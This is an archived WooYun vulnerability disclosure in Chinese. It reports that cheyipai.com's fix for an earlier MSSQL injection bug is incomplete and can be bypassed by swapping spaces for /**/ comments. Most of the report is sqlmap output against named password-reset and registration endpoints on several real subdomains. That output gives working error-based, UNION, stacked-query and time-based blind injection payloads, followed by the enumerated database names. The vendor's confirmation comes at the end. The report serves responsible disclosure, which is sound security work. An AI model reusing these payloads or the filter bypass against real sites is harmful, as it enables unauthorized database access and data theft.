乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-07: 细节已通知厂商并且等待厂商处理中 2015-02-09: 厂商已经确认,细节仅向厂商公开 2015-02-19: 细节向核心白帽子及相关领域专家公开 2015-03-01: 细节向普通白帽子公开 2015-03-11: 细节向实习白帽子公开 2015-03-24: 细节向公众公开
233
修复不当!原文: WooYun: 车易拍多个MSSQL注射(支持union和报错) 修改前
修改后
看起来貌似问题修复了。用sqlmap也没跑出来。但是。。。。。
问题又来啦!!!paylod把空格替换成/**/神啊,竟然绕过。。。
http://liantong.cheyipai.com:80/HttpHandler/UserCenter/ForgotPwd.ashx (POST)action=Verify_User&userName=&ValidCode=eParameter: userName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: action=Verify_User&userName=' AND 6738=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6738=6738) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'qBEP'='qBEP&ValidCode=e Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: action=Verify_User&userName=' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(72)+CHAR(87)+CHAR(106)+CHAR(98)+CHAR(89)+CHAR(98)+CHAR(71)+CHAR(107)+CHAR(72)+CHAR(68)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113)-- &ValidCode=e Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: action=Verify_User&userName='; WAITFOR DELAY '0:0:5'--&ValidCode=e Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: action=Verify_User&userName=' WAITFOR DELAY '0:0:5'--&ValidCode=e---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012available databases [9]:[*] DBSYSLog[*] DFAUCTION_BENZ[*] Manage[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb如lijiejie说的,其他几处:http://dongfang.cheyipai.com/HttpHandler/UserCenter/ForgotPwd.ashxhttp://kia.cheyipai.com/HttpHandler/UserCenter/ForgotPwd.ashx-------------------------------------------第二个参数:http://kia.cheyipai.com/HttpHandler/UserCenter/UC07RegisterHandler.ashx?type=GetCityByProId (POST)ParentCode=aaa---Parameter: ParentCode (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ParentCode=aaa' AND 5805=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5805=5805) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'vgEl'='vgEl Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: ParentCode=aaa' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(86)+CHAR(73)+CHAR(122)+CHAR(67)+CHAR(65)+CHAR(87)+CHAR(108)+CHAR(114)+CHAR(103)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(98)+CHAR(113)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ParentCode=aaa'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ParentCode=aaa' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012available databases [11]:[*] DBSYS[*] DBSYSLog[*] DFAUCTION[*] DFAUCTION_BENZ[*] Manage[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
1,修复完了多测试下。2,快过年放假了 跪求20rank!!!
危害等级:高
漏洞Rank:15
确认时间:2015-02-09 16:07
已开始排查,感谢提交
暂无